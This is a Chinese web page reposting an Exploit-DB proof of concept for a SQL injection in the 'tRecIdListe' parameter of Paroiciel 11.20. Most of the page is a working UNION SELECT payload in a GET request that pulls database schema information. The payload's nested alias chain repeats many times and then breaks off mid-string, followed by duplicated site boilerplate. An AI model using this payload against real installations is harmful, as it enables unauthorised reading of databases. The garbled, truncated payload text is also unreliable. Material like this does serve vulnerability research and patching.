Paroiciel 11.20 'tRecIdListe' SQL注入漏洞及POC

漏洞概述 漏洞名称: Paroiciel 11.20 - 'tRecIdListe' SQL Injection EDB-ID: 45810 作者: Ihsan Sencan 类型: Webapps 平台: PHP 发布日期: 2018-11-12 漏洞状态: EDB Verified 影响范围 受影响软件: Paroiciel 11.20 软件链接: https://datapacket.dl.sourceforge.net/project/paroiciel/version2011/par6lus_11_20160225.exe 测试环境: WIN7_x64/KaliLinux_x64 修复方案 建议: 更新软件至最新版本，确保所有已知漏洞已被修复。 参考链接: https://www.paroiciel.com/ POC代码 ```plaintext Exploit Title: Paroiciel 11.20 - 'tRecIdListe' SQL Injection Dork: N/A Date: 2018-11-09 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.paroiciel.com/ Software Link: https://datapacket.dl.sourceforge.net/project/paroiciel/version2011/par6lus_11_20160225.exe Version: 11.20 Category: Webapps Tested on: WIN7_x64/KaliLinux_x64 CVE: N/A POC: 1) http://localhost/[PATH]/html/trec.php?tRecAction=P&tRecIdListe=[SQL] GET /[PATH]/html/trec.php?tRecAction=P&tRecIdListe=-1%27%20%20UNION%20SELECT%201, (SELECT(@)FROM(SELECT(@:=0x00),(SELECT(@)FROM(infoRMATION_schema.columns)WHERE(TAB LE_NAme LIKE 0x74726563))A)B)C)D)E)F)G)H)I)J)K)L)M)N)O)P)Q)R)S)T)U)V)W)X)Y)Z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w)x)y)z)0)1)2)3)4)5)6)7)8)9)a)b)c)d)e)f)g)h)i)j)k)l)m)n)o)p)q)r)s)t)u)v)w

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Paroiciel 11.20 'tRecIdListe' SQL注入漏洞及POC

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Paroiciel 11.20 'tRecIdListe' SQL注入漏洞及POC

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！